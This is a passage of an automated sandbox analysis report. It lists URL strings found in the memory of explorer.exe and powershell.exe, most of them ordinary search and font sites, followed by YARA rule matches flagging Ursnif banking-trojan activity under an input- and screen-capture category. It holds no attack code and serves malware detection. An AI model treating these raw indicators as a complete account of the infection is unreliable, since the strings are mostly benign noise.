Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.271745722.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271874843.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271783751.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.406330368.000000000020E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.282144945.000000000363B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271900204.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271888074.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.511740839.000001657A17E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.508337116.00000209AC23E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.399209718.000001EEFF69E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
